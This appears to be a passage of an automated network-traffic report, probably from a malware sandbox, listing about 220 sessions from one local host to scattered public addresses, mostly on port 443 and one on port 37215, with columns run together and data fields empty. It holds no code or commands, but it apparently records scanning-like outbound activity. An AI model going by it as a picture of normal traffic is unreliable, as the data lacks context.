                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15090192.168.2.234357632.205.244.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15091192.168.2.235010442.32.140.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15092192.168.2.233968498.240.227.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15093192.168.2.235901697.165.41.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15094192.168.2.2355420112.51.168.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15095192.168.2.2352154218.127.22.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15096192.168.2.234194439.29.214.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15097192.168.2.235750613.49.101.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15098192.168.2.2342316207.34.229.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15099192.168.2.2340066195.210.221.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15100192.168.2.2349250211.13.181.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15101192.168.2.2348170211.91.98.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15102192.168.2.235412078.232.27.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15103192.168.2.2346466173.156.195.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15104192.168.2.2354684146.15.41.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15105192.168.2.2333918222.244.224.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15106192.168.2.235760474.196.5.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15107192.168.2.2355096143.74.135.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15108192.168.2.23580962.44.115.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15109192.168.2.2339956105.244.45.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15110192.168.2.2349484146.140.68.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15111192.168.2.2358554178.245.132.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15112192.168.2.234279659.162.247.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15113192.168.2.2349784153.36.21.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15114192.168.2.234055871.41.225.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15115192.168.2.233527449.98.104.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15116192.168.2.234992062.141.58.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15117192.168.2.2351134182.246.27.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15118192.168.2.2337358124.218.202.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15119192.168.2.2354552167.9.31.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15120192.168.2.235518878.215.211.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15121192.168.2.234178037.104.113.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15122192.168.2.2346302195.154.233.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15123192.168.2.2351906122.80.55.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15124192.168.2.233733050.168.117.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15125192.168.2.2347358216.229.230.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15126192.168.2.2357886184.197.20.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15127192.168.2.235209236.205.235.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15128192.168.2.2355640108.180.158.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15129192.168.2.2349766147.225.195.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15130192.168.2.235071479.178.205.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15131192.168.2.2339630140.191.105.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15132192.168.2.233531451.74.108.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15133192.168.2.2334254119.76.151.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15134192.168.2.2345594103.137.6.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15135192.168.2.2337608132.61.115.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15136192.168.2.2358130198.194.30.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15137192.168.2.2335496135.107.104.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15138192.168.2.2344458199.239.203.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15139192.168.2.234115075.24.109.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15140192.168.2.2334420106.147.56.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15141192.168.2.233822477.69.195.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15142192.168.2.2333204187.8.75.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15143192.168.2.235694842.209.68.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15144192.168.2.2347878197.63.4.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15145192.168.2.2360882119.192.63.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15146192.168.2.233389434.55.134.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15147192.168.2.2359894221.59.118.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15148192.168.2.2360338194.222.69.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15149192.168.2.234751684.121.62.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15150192.168.2.2345714157.30.59.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15151192.168.2.2346514181.52.191.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15152192.168.2.234683273.248.180.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15153192.168.2.234255041.68.169.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15154192.168.2.2356188110.48.130.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15155192.168.2.235258672.39.100.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15156192.168.2.234514289.245.221.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15157192.168.2.235911068.143.235.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15158192.168.2.2346622128.25.114.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15159192.168.2.2334358144.2.188.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15160192.168.2.2350762142.112.23.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15161192.168.2.233377678.168.139.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15162192.168.2.2340984185.138.98.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15163192.168.2.2345738162.75.216.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15164192.168.2.2359662141.172.217.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15165192.168.2.2347100156.126.196.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15166192.168.2.2357902170.113.97.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15167192.168.2.2342750134.86.222.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15168192.168.2.234640875.86.123.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15169192.168.2.235439043.82.170.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15170192.168.2.2358822198.107.187.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15171192.168.2.235914697.251.6.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15172192.168.2.2345248123.158.140.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15173192.168.2.233301219.137.85.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15174192.168.2.235494036.128.46.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15175192.168.2.235803089.175.97.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15176192.168.2.2349216190.198.170.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15177192.168.2.235793064.234.136.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15178192.168.2.233293219.55.195.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15179192.168.2.2337830131.107.180.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15180192.168.2.2345050198.56.61.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15181192.168.2.235341423.93.5.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15182192.168.2.2339282108.72.79.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15183192.168.2.23454568.34.233.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15184192.168.2.2335476171.13.20.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15185192.168.2.2334552130.218.197.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15186192.168.2.2335986133.65.244.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15187192.168.2.2346114213.79.62.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15188192.168.2.2340834106.118.106.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15189192.168.2.2355434184.140.129.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15190192.168.2.2356604197.188.54.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15191192.168.2.2356806207.245.191.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15192192.168.2.2359570115.71.16.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15193192.168.2.2354876175.5.223.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15194192.168.2.2355894154.123.162.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15195192.168.2.2356242126.71.75.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15196192.168.2.234632696.39.165.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15197192.168.2.235696889.190.139.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15198192.168.2.234839680.139.248.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15199192.168.2.234983853.245.154.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15200192.168.2.234508081.150.129.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15201192.168.2.234680442.127.111.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15202192.168.2.2359190159.241.29.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15203192.168.2.233676660.158.213.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15204192.168.2.2339466173.9.152.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15205192.168.2.2351266152.181.27.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15206192.168.2.2355590147.208.107.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15207192.168.2.2335804169.91.121.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15208192.168.2.234492231.15.136.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15209192.168.2.2340644138.175.233.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15210192.168.2.2341910106.255.146.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15211192.168.2.233562276.243.153.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15212192.168.2.2356808143.175.32.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15213192.168.2.2347722102.191.149.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15214192.168.2.2340668163.124.183.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15215192.168.2.2354590177.64.137.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15216192.168.2.235316694.121.128.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15217192.168.2.2337370165.167.139.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15218192.168.2.2353940174.196.80.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15219192.168.2.233970891.38.77.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15220192.168.2.233292413.87.190.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15221192.168.2.2333924193.24.234.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15222192.168.2.234431032.84.66.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15223192.168.2.2358214151.26.116.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15224192.168.2.2353948117.178.61.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15225192.168.2.2356130151.184.154.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15226192.168.2.234466070.108.8.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15227192.168.2.2341146140.253.62.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15228192.168.2.2334778148.35.138.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15229192.168.2.2350790104.219.67.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15230192.168.2.235331270.92.36.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15231192.168.2.2335060143.35.112.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15232192.168.2.233886438.217.108.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15233192.168.2.2351638138.69.102.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15234192.168.2.235515485.37.53.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15235192.168.2.2337190189.108.44.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15236192.168.2.2353396176.210.61.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15237192.168.2.2348454156.224.187.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15238192.168.2.2338620111.1.98.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15239192.168.2.2332836180.18.195.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15240192.168.2.2353902195.219.14.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15241192.168.2.2340438163.228.240.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15242192.168.2.2352122172.82.49.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15243192.168.2.2358954168.129.214.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15244192.168.2.2360788173.155.149.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15245192.168.2.2348038112.59.102.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15246192.168.2.2353186163.6.1.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15247192.168.2.234736060.214.182.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15248192.168.2.235577452.110.217.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15249192.168.2.2337080104.44.238.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15250192.168.2.23559829.170.22.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15251192.168.2.2350738106.169.235.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15252192.168.2.2335062129.61.111.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15253192.168.2.2336940213.227.75.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15254192.168.2.2336676139.133.187.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15255192.168.2.235309031.42.108.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15256192.168.2.2336570197.122.223.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15257192.168.2.2347356158.218.224.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15258192.168.2.2353242178.30.92.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15259192.168.2.2360306158.188.11.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15260192.168.2.235113689.100.15.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15261192.168.2.234383671.243.172.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15262192.168.2.23336549.211.185.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15263192.168.2.2338838201.142.174.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15264192.168.2.2351502114.168.149.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15265192.168.2.2349702175.198.56.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15266192.168.2.2348054208.225.22.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15267192.168.2.2332992204.25.80.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15268192.168.2.233984669.233.149.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15269192.168.2.235944097.7.234.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15270192.168.2.23595268.34.9.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15271192.168.2.233751420.23.239.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15272192.168.2.2347960149.74.133.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15273192.168.2.2360492194.17.223.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15274192.168.2.233344041.194.170.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15275192.168.2.236034812.26.14.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15276192.168.2.2353500102.130.114.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15277192.168.2.2344238135.2.168.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15278192.168.2.2360594219.231.219.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15279192.168.2.2358226222.23.191.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15280192.168.2.23519084.146.147.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15281192.168.2.2344080130.66.152.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15282192.168.2.233336817.205.157.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15283192.168.2.233313438.33.70.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15284192.168.2.2349348143.74.104.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15285192.168.2.2348410190.84.124.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15286192.168.2.233682477.186.68.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15287192.168.2.236024858.159.24.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15288192.168.2.235556847.93.254.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15289192.168.2.2345098140.156.253.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15290192.168.2.235182445.148.204.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15291192.168.2.2357574174.55.32.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15292192.168.2.233399034.108.169.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15293192.168.2.234186660.173.211.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15294192.168.2.23575205.134.34.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15295192.168.2.235292614.143.216.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15296192.168.2.235519058.122.189.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15297192.168.2.2360702173.129.251.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15298192.168.2.234771248.151.154.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15299192.168.2.2340720217.204.215.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15300192.168.2.2339056163.235.246.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15301192.168.2.23444869.17.66.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15302192.168.2.233489646.227.40.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15303192.168.2.2346794197.119.126.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15304192.168.2.2344306150.4.126.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15305192.168.2.2345224178.248.193.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15306192.168.2.235439844.93.225.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15307192.168.2.2343466144.45.218.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15308192.168.2.23510961.188.122.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15309192.168.2.2341588126.241.161.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15310192.168.2.2332848157.242.106.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15311192.168.2.2339674132.26.107.156443
